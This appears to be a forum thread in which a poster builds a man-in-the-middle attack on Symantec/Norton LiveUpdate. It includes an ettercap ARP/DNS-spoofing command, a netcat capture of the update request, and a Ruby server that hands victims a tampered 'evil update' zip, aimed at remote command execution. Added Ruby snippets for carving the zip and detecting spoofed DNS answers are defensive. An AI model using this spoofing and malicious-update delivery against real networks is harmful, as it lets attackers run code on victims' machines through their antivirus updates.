Mitm Tcp Dump. Spoof Symantic Update.zip


i8igmac
Maybe I could get someone's opinion. I have captured a GET request like /get symtec/id/dir/update.zip

I can reproduce this GET request with Ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents, but it fails.

I hope to write my own evilgrade-style exploit. Right now I'm on my Droid; I will post this GET request and the binary data tonight. Any thoughts on how to properly handle this zip file? Please share.

Are you sure the zip downloaded properly? They may cancel it if it doesn't use the same user agent Symantec uses to download it with, and it also might need an authentication hash or cookie of some sort to allow the download to work properly.

Make sure you look at all the traffic with something like Wireshark, and see what the request user agent is, if it's a GET or POST, if it uses gzip encoding to download, etc., etc.

You could also just try navigating to the URL in your browser and see if it spits you the file.

Edited by digip
ettercap, filter to drop encryption for more plain text... I fixed my problem with extracting the file ,-)

Instead of pasting to a text editor I just nc:

netcat xxx.xxx.xx 80 > out.zip
GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1.
If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT.
Cache-control: max-age=0.
Cache-Control: no-cache.
Cache-Control: max-stale=0.
Cache-Control: min-fresh=1000.
Accept: */*.
HOST: liveupdate.symantecliveupdate.com.
User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE.
Connection: Keep-Alive.

I opened out.zip with a text editor and removed the response header fields from the top of the file, and the file extracts just fine ,-)

I would really like to share more in depth, because this looks promising...

One of the files' contents looks like this, one line:

MOVE([TempDir],%StreamDefDir%)

I think this could give me sort of remote command execution.

A quick test would be 'ping 192.168.1.101' (my laptop IP).

I found this log someone posted, and it now gives me a better view of what's going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt
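The header-stripping step described above (dump the raw response with netcat, then cut the HTTP headers off the top of the file by hand) is easy to get wrong when the body is truncated or encoded. The Ruby below is an added example, not code from this thread: it splits a saved raw HTTP response into headers and body at the end-of-headers marker, then checks the carved body against Content-Length and the ZIP local-file-header signature, so a short or chunked/gzip-encoded capture is reported instead of failing silently at extraction time. The sample response is constructed.

```ruby
# Carve the body (here, a ZIP file) out of a raw HTTP response that was saved
# to disk together with its headers, e.g. with "nc host 80 > out.zip".
# Added example, not code from the thread.

ZIP_MAGIC = "PK\x03\x04".b   # ZIP local file header signature

# Split a raw HTTP/1.x response into status line, header hash and body bytes.
# Returns nil if no end-of-headers marker is present (truncated capture).
def split_http_response(raw)
  raw = raw.b
  # RFC 7230 terminator is CRLF CRLF; tolerate a bare LF LF from captures
  # that were pasted through a text editor.
  idx = raw.index("\r\n\r\n")
  sep_len = 4
  if idx.nil?
    idx = raw.index("\n\n")
    sep_len = 2
  end
  return nil if idx.nil?

  head = raw[0, idx]
  body = raw[(idx + sep_len)..-1]
  lines = head.split(/\r?\n/)
  status_line = lines.shift
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    next if value.nil?                     # not a "Name: value" line
    headers[name.strip.downcase] = value.strip
  end
  { status: status_line, headers: headers, body: body }
end

# Check the carved body: a Content-Length mismatch means a truncated or
# over-long capture; chunked transfer-encoding means the body must be
# de-chunked first; a missing ZIP signature means it is not a plain zip.
def check_zip_body(resp)
  problems = []
  if (len = resp[:headers]['content-length'])
    if len.to_i != resp[:body].bytesize
      problems << "content-length #{len} != body #{resp[:body].bytesize} bytes"
    end
  end
  if resp[:headers]['transfer-encoding'].to_s.downcase.include?('chunked')
    problems << 'chunked transfer-encoding: body must be de-chunked first'
  end
  unless resp[:body].start_with?(ZIP_MAGIC)
    problems << 'body does not start with the ZIP local-file-header signature'
  end
  problems
end

# Returns [body, problems]; writes the body to out_path only when clean.
def carve_zip(raw, out_path = nil)
  resp = split_http_response(raw)
  return [nil, ['no end-of-headers marker found']] if resp.nil?
  problems = check_zip_body(resp)
  File.binwrite(out_path, resp[:body]) if out_path && problems.empty?
  [resp[:body], problems]
end

# Constructed sample: a response wrapping a fake ZIP (a local header start
# followed by an end-of-central-directory signature, padded with zeros).
SAMPLE_BODY = ("PK\x03\x04" + "\x00" * 26 + "PK\x05\x06" + "\x00" * 18).b
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\n" \
                   "Content-Type: application/zip\r\n" \
                   "Content-Length: #{SAMPLE_BODY.bytesize}\r\n" \
                   "Connection: keep-alive\r\n" \
                   "\r\n").b + SAMPLE_BODY

if __FILE__ == $0
  body, problems = carve_zip(SAMPLE_RESPONSE)
  puts problems.empty? ? "carved #{body.bytesize} bytes" : problems.join("\n")
end
```

Run it against a real capture with `carve_zip(File.binread('out.zip'), 'clean.zip')`; the file is only written when every check passes.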


2 weeks later...

Here is a quick update on what I have done so far... I was going to make a video but I see no need... The client successfully downloads the modified zip file from my computer during the DNS spoof (screenshot of Wireshark). I just need to modify the zip package's contents to trigger execution...

sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //

First, the ettercap filter drops encryption for more plaintext (not sure if it's needed for this situation, but I like to use it):
dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]

sudo ruby exploit.rb

(It's something I put together in a few minutes, don't judge me ,-P)

require 'socket'                   # SERVER
server = TCPServer.open(80)
loop {
  client = server.accept
  print client.read(100)           # should receive GET /minitri.flg

  # HTTP header lines end in CRLF and the header block ends with an empty
  # line, so the terminator is "\r\n\r\n" (the original had "\n\r\n\r").
  client.print("HTTP/1.1 200 OK\r\n" \
               "Content-Length: 1\r\n" \
               "Content-Type: text/plain\r\n" \
               "Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT\r\n" \
               "ETag: \"1-42ea9080\"\r\n" \
               "Accept-Ranges: bytes\r\n" \
               "Date: Sun, 15 May 2011 01:52:21 GMT\r\n" \
               "Connection: keep-alive\r\n" \
               "Cache-Control: public,must-revalidate,max-age=1800\r\n" \
               "\r\n" \
               "\n")               # the single body byte announced by Content-Length

  print client.read(100)           # should receive GET /update symnetc from client

  fileContent = File.binread('/home/bigmac/out.zip')   # new evil update

  client.print("HTTP/1.1 200 OK\r\n" \
               "Content-Type: application/zip\r\n" \
               "Content-Length: #{fileContent.bytesize}\r\n" \
               "Last-Modified: Sun, 15 May 2011 21:16:04 GMT\r\n" \
               "ETag: W/\"15a1-4dd04294\"\r\n" \
               "Accept-Ranges: bytes\r\n" \
               "Date: Sun, 15 May 2011 20:50:18 GMT\r\n" \
               "Connection: keep-alive\r\n" \
               "Cache-Control: public,must-revalidate,max-age=240\r\n" \
               "\r\n")

  # now send payload
  client.print(fileContent)

  client.close                     # Disconnect from the client
}

Wireshark screenshot of the zip file downloaded, 192.168.1.102 <---> 192.168.1.104:

img838.imageshack.us/i/screenshotwireshark.png

... I should post the zip file; I'm sure all that is needed is changing a few numbers around to trigger execution.
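The dns_spoof line in this post is also exactly what a defender can watch for: a public vendor update host resolving to an address in private (RFC 1918) space, which only happens when something on the LAN is answering for it. The Ruby below is an added example, not part of the thread, that runs that check over constructed resolver log lines; the whitespace-separated log format and the list of watched hostnames are assumptions.

```ruby
require 'ipaddr'

# Constructed resolver log lines (not from the thread), in an assumed
# "<timestamp> <client> <qname> <rtype> <answer>" whitespace-separated format.
SAMPLE_DNS_LOG = <<~LOG
  2011-05-15T20:50:10Z 192.168.1.102 liveupdate.symantecliveupdate.com A 192.168.1.104
  2011-05-15T20:50:11Z 192.168.1.102 www.example.com A 203.0.113.10
  2011-05-15T20:50:12Z 192.168.1.102 printer.lan A 192.168.1.20
  2011-05-15T20:50:13Z 192.168.1.102 liveupdate.symantecliveupdate.com. A 203.0.113.44
LOG

# Address space that a public vendor update server must never resolve into.
PRIVATE_RANGES = %w[10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 127.0.0.0/8 169.254.0.0/16]
                 .map { |cidr| IPAddr.new(cidr) }

# Update hosts to watch; only the one named in the thread is listed here.
UPDATE_HOSTS = %w[liveupdate.symantecliveupdate.com]

# True when ip parses as an address inside one of PRIVATE_RANGES.
def private_address?(ip)
  addr = IPAddr.new(ip)
  PRIVATE_RANGES.any? { |range| range.include?(addr) }
rescue IPAddr::InvalidAddressError
  false
end

# Return one alert hash per A record that maps a watched update host to a
# private address, which is what the dns_spoof plugin produced above.
def detect_spoofed_update_answers(log, update_hosts = UPDATE_HOSTS)
  alerts = []
  log.each_line do |line|
    ts, client, qname, rtype, answer = line.split
    next if answer.nil?                         # malformed or short line
    next unless rtype == 'A'
    name = qname.downcase.chomp('.')            # tolerate a trailing root dot
    next unless update_hosts.include?(name)
    next unless private_address?(answer)
    alerts << { time: ts, client: client, qname: name, answer: answer }
  end
  alerts
end

if __FILE__ == $0
  detect_spoofed_update_answers(SAMPLE_DNS_LOG).each do |a|
    puts "ALERT #{a[:time]} #{a[:client]} got #{a[:qname]} -> #{a[:answer]} (private address)"
  end
end
```

Of the four constructed lines only the first fires: the printer.lan answer is private but not a watched host, and the second liveupdate answer is a public address. The same check works for a broader list of vendor update hosts, since none of them should ever legitimately resolve into RFC 1918 space.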
